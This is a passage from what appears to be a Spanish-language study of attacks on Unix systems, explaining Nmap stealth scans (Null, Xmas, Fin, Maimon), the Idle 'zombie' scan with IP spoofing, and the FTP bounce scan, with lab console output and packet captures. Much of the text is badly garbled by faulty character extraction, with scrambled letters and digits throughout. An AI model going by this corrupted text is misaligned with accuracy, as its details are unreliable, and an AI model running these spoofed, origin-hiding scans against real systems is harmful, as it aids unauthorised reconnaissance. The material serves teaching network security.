no deber)a suceder este caso en un /lujo nor al>. Es "or esto que# si el "ort scanner env)a a un $ost%"uerto un "aquete con cualquier co binaci8n de /lags que no inclu'a ,K@# <,F o ACR# deber)a obtener un <,F si el "uerto está cerrado# ' ninguna res"uesta si el "uerto está abierto ;o /iltrado# claro está>. 2na contingencia a tener en cuenta es que en éste "unto en "articular no todos los ,iste as ?"erativos siguen esta reglaH los no basados en 2ni9 ;4indoIs# Cisco# 7BM ?,&1..# etc.> suelen enviar un <,F sie "re# esté el "uerto abierto o cerrado. Es "or eso que "or un lado $a' que Cto ar con "inzasD los resultados de este escaneo ' no co o de/initivosH "or otra "arte# sigue siendo in/or aci8n Gtil saber que "or eje "lo# si se $a recibido un <,F a "esar de que ciertos "uertos estén abiertos# el ,? destino no es un 2ni9 o derivado ' s) "robable ente está corriendo un ,? 4indoIs o Cisco. Ade ás# lo interesante de estas técnicas de escaneo es que "er iten "asar "or edio de los /ireIalls sin estado o stateless+O ;aquellos que no tienen noci8n de las cone9iones "revia ente establecidas># 'a que "or eje "lo éstos /iltran los "aquetes s8lo con el /lag ,K@ activado ' que no cu "la cierta condici8n ;"or eje "lo# que el "uerto destino sea O.>H sin e bargo# al enviarle "aquetes F7@# dic$a regla no alcanza este "aquete# "or lo que es ruteado al destino. Co o "articularidad a las caracter)sticas descri"tas# en el Mai on scan# al enviarle un F7@_ACR a un $ost que ejecute algGn viejo stac6 FC!&7! ti"o B,5+0 o derivado% si el <,F de res"uesta contiene un FF: de ventana es enor al original# o el ta aBo a'or a cero# entonces el "uerto está abiertoS!<RU10T.

A continuaci8n ;Consola @ro. 5> "ueden verse las di/erentes ejecuciones sucesivas de estos cuatro ti"os de escaneo sobre el $ost *02.*JO...-.# que tiene el "uerto 22 abierto ' el resto cerrados ;no $a' ningGn /ireIall inter"oniéndose>. !or
+O :os /ireIalls o dis"ositivos de /iltrado de "aquetes básica ente se categorizan en varios gru"os# de acuerdo a cuán so/isticados son ' qué caracter)sticas "oseen% C statelessD o Csin estadoD# CstatefulD o Ccon estadoD# ' "or Glti o los de Cca"a de a"licaci8nD. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&FireIall +0 :a i "le entaci8n del stac6 FC!&7! de B,5 es la versi8n de re/erencia ' ás e9tendida de los algorit os es"eci/icados "or los <FC ;aunque $a' otras># incluso $asta ,?s con arquitecturas di/erentes co o 4indoIs# la usan. :a versi8n actual ;vigente desde *00.> es la <eno FC! ' su versi8n "osterior# 1.1B,5(:ite. Ler% $tt"%&&es.Ii6i"edia.org&Ii6i&7 "le entacionesUdeUFC! Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 10 de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

brevedad s8lo se

uestra aqu) una Gnica ca"tura ;la @ro. O>H el resto ;@ros. 0 a **>

están dis"onibles en el Ane9o B>. En las ca"turas de trá/ico "uede verse que justa ente# salvo "ara el "uerto abierto 22 ;donde no $a' res"uesta alguna># la res"uesta del $ost *02.*JO...-. es un <,F_ACR.
marcelo@saturno:~/src/nmap/bin$ ((4(54)0 u7o .;nmap - N 19(.16).0.30 -p

.tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:+( #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p openFfi"tere7 ' (5;t!p !"o e7 mtp )0;t!p !"o e7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 1.5+1 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - 3 19(.16).0.30 -p ((4(54)0 .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:+3 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p !"o e7 ' (5;t!p !"o e7 mtp )0;t!p !"o e7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 0.393 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - G 19(.16).0.30 -p (0-(( .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:++ #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< (0;t!p !"o e7 ftp-7ata (1;t!p !"o e7 ftp ((;t!p openFfi"tere7 ' 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 1.677 e!on7 marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - B 19(.16).0.30 -p ((41104)0)0 .tarting Nmap +.53 9 'ttp:;;in e!ure.org : at (00)-03-0+ 1(:+5 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p openFfi"tere7 ' 110;t!p !"o e7 pop3 )0)0;t!p !"o e7 'ttp-proDE 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 1.5+3 e!on7

Consola 5% Escaneos @ull# Mai on# A as ' Fin al $ost *02.*JO...-. res"ectiva ente

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 5. de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.000+31 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.03(196 Origen: 19(.16).0.(:5+999 -> De tino: 19(.16).0.30:(5 Proto!o"o: T,P De !rip!i%n: 5+999 > (5 -0 .eq10 2en10 Paquete Nro: + Tiempo: 0.03(+37 Origen: 19(.16).0.30:(5 -> De tino: 19(.16).0.(:5+999 Proto!o"o: T,P De !rip!i%n: (5 > 5+999 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 5 Tiempo: 0.03(51) Origen: 19(.16).0.(:5+999 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 5+999 > )0 -0 .eq10 2en10 Paquete Nro: 6 Tiempo: 0.03(60+ Origen: 19(.16).0.30:)0 -> De tino: 19(.16).0.(:5+999 Proto!o"o: T,P De !rip!i%n: )0 > 5+999 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 7 Tiempo: 0.03(667 Origen: 19(.16).0.(:5+999 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5+999 > (( -0 .eq10 2en10 Paquete Nro: ) Tiempo: 1.1+799+ Origen: 19(.16).0.(:55000 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 55000 > (( -0 .eq10 2en10

Ca"tura O% Ca"tura de un @ull ,can

1.-.+. 7dle ,can
El 7dle ,can "uede decirse que es bastante di/erente a los anteriores# dado que el "ort scanner no utiliza Gnica ente el $ost donde se está ejecutando "ara enviar "aquetes directa ente al destino# sino que se a"rovec$a de la e9istencia otro $ost inter edio ;Czo bieD># que debe estar inactivo en cuanto a

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 5* de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

env)o&rece"ci8n de trá/icoO. ' es el que real ente actGa co o origen de los "aquetes de "rueba "ara el destino. ,i bien es un "roceso algo largo# "uede resu irse en los siguientes "asos# su"oniendo co o =ost A el origen# B el zo bie ' C el destino. 7. A co "rueba% a> :a "redictibilidad en la generaci8n del ca "o 75 de 7!O* de B ;7!(75 de a$ora en ás>. Es decir# el "ort scanner en A c$equea que B utilice algGn algorit o "redecible ;nor al ente nG eros secuenciales> "ara identi/icar ;o C arcarD> los "aquetes 7!. Esto lo $ace enviándole varios "aquetes ,K@_ACR "ara obtener <,Fs ' c$equear que los 7!(75 de las res"uestas son e/ectiva ente sucesivos ;o "redecibles al BD. b> Al enviarle dic$os "aquetes ,K@_ACR ' recibir los res"ectivos <,F desde B# A ta bién veri/ica que B esté sin trá/ico# 'a que de otra anera# los 7!(75s no ser)an secuenciales. +. ,i B "asa las "ruebas que $ace A# entonces B es adecuado "ara utilizar co o Qo bie ' se guarda el Glti o 7!(75 recibido. ;. El "ort scanner en A le env)a directa ente a C "aquetes ,K@ $aciendo ,"oo/ing de la 7!O- de B. 5ic$os "aquetes enviados son# en realidad# el escaneo de "uertos real ;es un ,'n ,can nor al# van dirigidos a los "uertos que a A le interesa saber su estado>H la di/erencia se encuentra en que A sabe que al $aber $ec$o s"oo/ing de la 7! de B# las res"uestas de C no serán devueltas a A# sino que irán destinadas a B ;"aso 1>. <. C# al recibir un "aquete con ,K@ Cdesde BD ;aunque en realidad sea A># va co "ortarse co o un rece"tor clásico de un ,K@ ,can% si el "uerto
O. 5e aqu) "roviene el no bre de 6dle Scan# es decir# idle signi/ica CinactivoD en inglés. O* El Ca "o 75 del encabezado 7! es utilizado "ara /rag entar los datagra as en algGn "unto de la co unicaci8n ' reensa blarlos en otro. ,e utilizan nG eros secuenciales "ara relacionar un Gnico seg ento de Ca"a 1 en varios datagra as 7! de Ca"a -. Ler SFC!&7!U7llT# Ca". **.5. O2 !ara ás in/or aci8n sobre el algorit o que utiliza @ a" "ara averiguar si el 7!(75 es odi/ica el ca "o corres"ondiente a la direcci8n 7! de "redecible# ver% $tt"%&&n a".org&osdetect&osdetect( et$ods.$t lcosdetect(ti O- !ara $cer s"oo/ing de una 7!# @ a" ?rigen del encabezado de los "aquetes que env)a. Ler S7!U,!??FT. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 52 de 2*.

enosO2>.

Este "roceso "uede lla árselo co o C"regunta nG ero de 7!(75 de

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

destino está abierto# intentará iniciar la cone9i8n enviándole a B un ,K@_ACR. ,i el "uerto está cerrado# le devolverá un <,F_ACR. . B# al no $aber iniciado cone9i8n alguna con C ' recibir un "aquete "roveniente de él# to a uno de los dos ca inos% a> ,i recibe un ,K@_ACR desde C ;'a que el "uerto en C está abierto># "ara B esto no tiene sentidoH in ediata ente le env)a a C un <,F# incrementando el I4.ID en uno ;o generando un valor nuevo "redecible "or A>. C con esto cierra la cone9i8n alf'open ;C edia abiertaD>. b> ,i recibe un <,F_ACR ;'a que el "uerto en C está cerrado># "ara B esto es trá/ico CnuloD# es decir# ignora el "aquete. #. :uego de unos instantes de de ora# A vuelve a C"reguntarD el nG ero actual de 7!(75 de B# ' nueva ente# $a' dos alternativas% a> El 7!(75 se incre ent8 en uno% entonces el "uerto en C está abierto "ara B. b> El 7!(75 no se incre ent8% entonces el "uerto en C está cerrado o /iltrado. Fjemplo ! /aptura de un Idle Acan%
marcelo@saturno:~/src/nmap/bin$ u7o nmap - 8 19(.16).0.30 19(.16).0.100 -p ((4(5 &#$N8NH: 3anE peop"e u e -P0 >;87"e !an to pre@ent ping from t'eir true 8P. On t'e ot'er 'an74 timing info Nmap gain from ping !an a""o> for fa ter4 more re"iab"e !an . .tarting Nmap +.(0 9 'ttp:;;in e!ure.org : at (00)-03-06 13:(3 #$.T Idlescan using zombie 192.168.0. 0 !192.168.0. 0:80"# $lass: Incremental 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< ((;t!p !"o e7Ffi"tere7 ' (5;t!p open mtp 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: Nmap fini 'e7: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 3.+)+ e!on7

Consola J% 7dle ,can a *02.*JO...*. usando co o Qo bie a *02.*JO...-.

En la consola J se

uestra una ejecuci8n t)"ica de @ a" corriendo un 7dle

,canH en este caso "ara veri/icar si los "uertos 22 ' 25 están abiertos en el $ost *02.*JO...*.. utilizando co o Qo bie a *02.*JO...-.. !ara "oder co "render la ca"tura de trá/ico# $a' que recordar que el =ost A tiene la MAC address
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 5- de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

..%*+%-*%0J%5b%*/# el =ost B la MAC ..%.c%20%e*%a2%2J ' el =ost C la MAC ..%.c%20%0.%2a%2d. <elacionar la 7! con cada $ost "uede ser engaBoso# 'a que A utilizará las tres direcciones 7! de /or a indistinta.
... Paquete nro. 3 - Tiempo 0.0(9939 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:7))( Brag:02 TT2:37 9...: T,P ?ea7er: .Port:+617+ )*ort:80 .eqN:13(0+0++1 #!6N:(303113(51 +lags:0,12!-%" &n7:(0+) 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+617+ > 19(.16).0.30:>>> .# Paquete nro. + - Tiempo 0.03193( 3a! Origen: 00:0!:(9:e1:a(:(6 !(" -> 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):81 Brag:02 TT2:6+ 9...: T,P ?ea7er: -*ort:80 DPort:+617+ .eqN:(303113(51 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+617+ $ Paquete nro. 5 - Tiempo 0.065571 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:3))03 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6175 )*ort:80 .eqN:13(0+0++( #!6N:(303113(51 +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6175 > 19(.16).0.30:>>> .# Paquete nro. 6 - Tiempo 0.065)0+ 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):82 Brag:02 TT2:6+ 9...: T,P ?ea7er: -*ort:80 DPort:+6175 .eqN:(303113(51 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6175 $ ... Paquete nro. 15 - Tiempo 0.19++50 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 192.168.0.100 &' 192.168.0. 0 8P ?ea7er: =er ion:+2 2en:++ 8D:1+395 Brag:02 TT2:5( 9...: T,P ?ea7er: .Port:+6173 DPort:)0 .eqN:13(0+0++1 #!6N:(303113(51 +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100:+6173 > 19(.16).0.30:>>> .# Paquete nro. 16 - Tiempo 0.19+6(0 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 192.168.0. 0 &' 192.168.0.100 8P ?ea7er: =er ion:+2 2en:+0 I):80 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6173 .eqN:(303113(51 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100:+6173 $ ...

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 51 de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

Paquete nro. (7 - Tiempo 0.653+67 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 192.168.0.2 &' 192.168.0. 0 8P ?ea7er: =er ion:+2 2en:++ 8D:+6(96 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:+6330 DPort:)0 .eqN:()70071(9( #!6N:397)13361+ +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6330 > 19(.16).0.30:>>> .# Paquete nro. () - Tiempo 0.653739 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 192.168.0. 0 &' 192.168.0.2 8P ?ea7er: =er ion:+2 2en:+0 I):91 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6330 .eqN:397)13361+ #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6330 $

Ca"tura 0% C$equeo de ,ecuencialidad% FC! !ing ;,K@_ACR> de A en busca de <,F de B

En la Ca"tura 0 "uede verse en acci8n el "unto *% A "ri ero env)a insistente ente ;varias veces> "aquetes FC! con ,K@_ACR desde su 7!# tratando de deter inar si del <,F de res"uesta# el 75 del encabezado 7! es secuencial. Co o se "uede ver# el 75 "ri ero es O* ' luego O2 ;' as) sucesiva ente "ara cada C"reguntaD# "aquetes - al J>. :uego A $ace s"oo/ing de la 7! de C ' ta bién env)a "ruebas "ara averiguar si la 75 de los <,F siguen siendo secuenciales ;!aquete *5>. !ero co o estas res"uestas son devueltas al =ost C real ;!aquete *J># la Gnica anera de que A co "ruebe la su"osici8n de que los 75 se

Paquete nro. (9 - Tiempo 0.653)51 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 192.168.0. 0 &' 192.168.0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:335(0 Brag:02 TT2:5( 9...: T,P ?ea7er: .Port:)0 )*ort:21 .eqN:(30079163) #!6N:0 +lags:0,02!-" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp . Paquete nro. 30 - Tiempo 0.65+0+9 3a! Origen: 00:0!:(9:90:(a:(7 !$" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:(5 Brag:02 TT2:6+ 9...: T,P ?ea7er: -*ort:21 DPort:)0 .eqN:(1599+6)01 #!6N:(300791639 +lags:0,12!-%" &n7:30660 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: mtp > 19(.16).0.30:>>> .# ... Paquete nro. 3( - Tiempo 0.65+33+ 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 19(.16).0.30 -> 19(.16).0.100 8P ?ea7er: =er ion:+2 2en:+0 I):92 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 )*ort:21 .eqN:(300791639 #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: mtp $ ...

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 55 de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

incre entaron secuencial ente es volviendo a C"reguntarD co o al co ienzo ;!aquetes 2+ ' 2O>. All) /inaliz8 la eta"a *# ' A CguardaD el Glti o 7!(75 0* antes de $acer el escaneo en s).
Paquete nro. 3+ - Tiempo 0.705565 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:15757 Brag:02 TT2:59 9...: T,P ?ea7er: .Port:+6(+) DPort:)0 .eqN:()7007179( #!6N:397)13361+ +lags:0,12!-%" &n7:+096 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6(+) > 19(.16).0.30:>>> .# Paquete nro. 35 - Tiempo 0.705)51 3a! Origen: 00:0!:(9:e1:a(:(6 !(" &' 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):9 Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6(+) .eqN:397)13361+ #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6(+) $

Ca"tura *.% Ejecuci8n del 7dle ,can en s)# dado que el "uerto 25 está abierto

:uego# A realiza lo siguiente "ara el "ri er "uerto a escanear ;el 25>%

Enviar el escaneo de "uertos a C C intiendoD sobre su direcci8n 7! ;aunque se lo "uede CdescubrirD en la ca"tura "or su direcci8n MAC>. ;20> C# co o tiene el "uerto 25 abierto# env)a el ,K@_ACR a B ;-.>. B# co o en ningGn o ento inici8 ninguna cone9i8n# env)a un <,F a C e incrementa su I4.ID a L+ ;-2>.

● ●

A vuelve a C"reguntarD a B "or su 7!(75H co o el <,F contiene el 75 0-# A sa(e que el puerto + en / está a(ierto ;'a que si $ubo un 7!(75 02# /ue el <,F que B le envi8 a C $ace un instante>.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 5J de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

Paquete nro. 36 - Tiempo 0.7059+) 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:90:(a:(7 !$" 8P Origen: 192.168.0. 0 &' 192.168.0.100 8P ?ea7er: =er ion:+2 2en:++ 8D:15305 Brag:02 TT2:+0 9...: T,P ?ea7er: .Port:)0 )*ort:22 .eqN:(30079163) #!6N:0 +lags:0,02!-" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.100: ' . Paquete nro. 37 - Tiempo 0.7060)7 3a! Origen: 00:0!:(9:90:(a:(7 !$" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.100 -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:+0 8D:(6 Brag:02 TT2:(55 9...: T,P ?ea7er: -*ort:22 DPort:)0 .eqN:0 #!6N:(300791639 +lags:0,1.!/%" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.100: ' > 19(.16).0.30:>>> $# ... Paquete nro. 39 - Tiempo 0.757+75 3a! Origen: 00:17:31:96:5b:1f !%" &' 3a! De tino: 00:0!:(9:e1:a(:(6 !(" 8P Origen: 19(.16).0.( -> 19(.16).0.30 8P ?ea7er: =er ion:+2 2en:++ 8D:13500 Brag:02 TT2:56 9...: T,P ?ea7er: .Port:+6376 DPort:)0 .eqN:()7007((9( #!6N:397)13361+ +lags:0,12!-%" &n7:10(+ 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:+6376 > 19(.16).0.30:>>> .# Paquete nro. +0 - Tiempo 0.757751 3a! Origen: 00:0!:(9:e1:a(:(6 !(" -> 3a! De tino: 00:17:31:96:5b:1f !%" 8P Origen: 19(.16).0.30 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 2en:+0 I):9. Brag:02 TT2:6+ 9...: T,P ?ea7er: .Port:)0 DPort:+6376 .eqN:397)13361+ #!6N:0 +lags:0,0.!/" &n7:0 9...: De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.30:>>> > 19(.16).0.(:+6376 $

Ca"tura **% 7dle ,can% El "uerto 22 en C está Cerrado

!ara el Glti o "uerto a escanear en C ;el 22>%

A vuelve a enviar un "aquete ,K@ al "uerto 22 de C C entirosoD con la 7! origen de B ;-J>. Co o el "uerto en C está cerrado# env)a un <,F_ACR a B ;-+>. B no $ace nada# descarta este "aquete. A vuelve a C"reguntarD "or el 7!(75. El 7!(75 no se incre ent8 ;es 01># "or lo que A asu e que B no env)o ningGn <,F luego del "aquete -J. 4or lo tanto% A asume que el puerto ++ en / está cerrado.O1

Bentajas ! Desventajas del Idle Acan @ a" en realidad generaliza en /or a "oco 8"ti a este "roceso "ara varios "uertos# "ero de todas aneras lo ejora ;se co "orta en /or a "arecida a una
ás i "ortantes. El O1 ,i bien en el Ane9o B está detallada toda la ca"tura# estos son los "aquetes is os. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 5+ de 2*.

resto son nuevos intentos ' "ruebas que realiza el @ a"# "ero los resultados siguen siendo los

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

bGsqueda binaria recursiva>. 2na de las ventajas es que ni C ni su ad inistrador se enteran en ningGn o ento que el escaneo "rovino en realidad de A. ?tra es que A "uede detectar relaciones Cde con/ianzaD entre B ' CH es decir# si C tiene reglas di/erentes "ara B que lo $acen es"ecial ;"or eje "lo# le "er ite "asar cierto trá/ico># A "uede detectarlo. Entre las Clara ente# a'ores desventajas# está la de encontrar un Qo bie adecuado. ás allá de que B debe utilizar un ,iste a ?"erativo que asigne 7!(

75s "redecibles "ara todo el trá/ico# B debe "oseer algGn "uerto sin /iltrar "ara que A "ueda obtener <,Fs. Fa bién "uede co "licar el trá/ico que tenga B en ese o ento# co o ta bién la cantidad de "aquetes que es necesario interca biar# con el consiguiente consu o de anc$o de banda ' "érdida de tie "o $asta obtener un resultado. !ara ás detalles de este escaneo# ver S,@CU75:ET ' S@MA!U75:ET.

1.-.O. FF! Bounce ,can
Este ti"o de escaneo a"rovec$a una vieja vulnerabilidad de los servidores FF! al i "le entar lo establecido "or el <FC 050O5# que es quien de/ine el "rotocolo FF!. En dic$a es"eci/icaci8n# se "er ite un uso alternativo del co ando !?<FOJ# con el objetivo de que un servidor FF! env)e arc$ivos "ro"ios o in/or aci8n a otro servidor FF! distinto al cliente original. =o' en d)a esto co Gn ente se lla a FA!O+. ,in e bargo# en este ti"o de escaneo se a"rovec$a de esta /uncionalidad "ara "edirle al ,ervidor FF! que se conecte a la 7! ' "uerto del objetivo# indistinta ente si es un FF! ,erver o noH en realidad# el <FC ;' los servidores FF! vulnerables> no i "iden que sea cualquier 7! ' "uerto ;aqu) reside el origen de la vulnerabilidad>. ,i la cone9i8n es e9itosa# el servidor FF! lo in/or a al cliente FF! ;el "ort
O5 Enlace al <FC 050 del "rotocolo FF!% $tt"%&&tools.iet/.org&$t l&r/c050# "ágina 0. OJ El uso tradicional del co ando !?<F es "ara iniciar una cone9i8n de datos FF! en lo que se lla a CModo ActivoD con el cliente. =o' en d)a# "or ser re"resenta es el !A,L. O+ FA! ;File eFc ange Protocol ' !rotocolo de interca bio de Arc$ivos> Es una "er ite que un cliente le ordene a un servidor FF! enviar un arc$ivo ;o datos> a otro servidor directa ente entre ellos# sin que intervenga el etodolog)a que ás genérica ente# ás "ráctico en la con/iguraci8n de /ireIalls# se usa e9tensiva ente "ara esto el CModo !asivoD# ' el co ando FF! que lo

is o cliente.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 5O de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

scanner># ' éste

arca el "uerto co o abierto. En caso contrario el servidor FF!

ta bién lo in/or a ;con un error> que el "ort scanner reconoce# viendo el "uerto del destino co o cerrado. 5ado un esque a si ilar al 7dle ,can anterior ;donde A es el $ost que ejecuta el "ort scanner# B es el ,ervidor FF! ' C el equi"o objetivo># la secuencia de ataque t)"ica es% *. El "ort scanner en A se conecta al FF! ,erver en B. 2. A le env)a un co ando !?<F a B de anera que se conecte a C. ensaje de ?R. -. ,i el FF! en B "er ite la ejecuci8n del co ando !?<F con los "ará etros que se le "asaron# devuelve un co ando 1. :legado este "unto# el "ort scanner usual ente "ide la ejecuci8n del ás co Gn del "rotocolo FF!% :7,FH esto es s8lo "ara que el servidor FF! en B e/ectiva ente se conecte al objetivo C e intente enviar un listado de arc$ivos del directorio ;B su"one que en esa 7! ' "uerto $a' otro FF! ,erver>. 5. ,i B tiene é9ito en la cone9i8n ;$ubo un t ree'.a1 ands ake entre B ' C># env)a "or el canal FF! establecido "revia ente un A identi/ica
OO

ensaje de ?R que

' le "er ite

arcar el "uerto co o abierto. ensaje de error

J. ,i B no tiene é9ito en la cone9i8n ;al ,K@ de B le sigui8 un <,F_ACR de C o un ti eout "orque el "uerto está /iltrado># B env)a un "or la cone9i8n FF! entre A ' B# ' el "ort scanner cerrado. arca el "uerto co o

OO En el "rotocolo FF!# al igual que en el "rotocolo =FF!# a un co ando del cliente le sigue una res"uesta del servidorH dic$as res"uestas están de/inidas en los <FC ' están "recedidas "or un c8digo de ensaje ;un nG ero># ade ás del ensaje en /or ato te9to ;'a que en los inicios de a'ores a 2.. son de C?RD# los internet un cliente "od)a ser un usuario $u ano>. :os c8digos

a'ores a 1.. son de CErrorD ' as) sucesiva ente. Ler S47R7UFF!CT. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 50 de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"
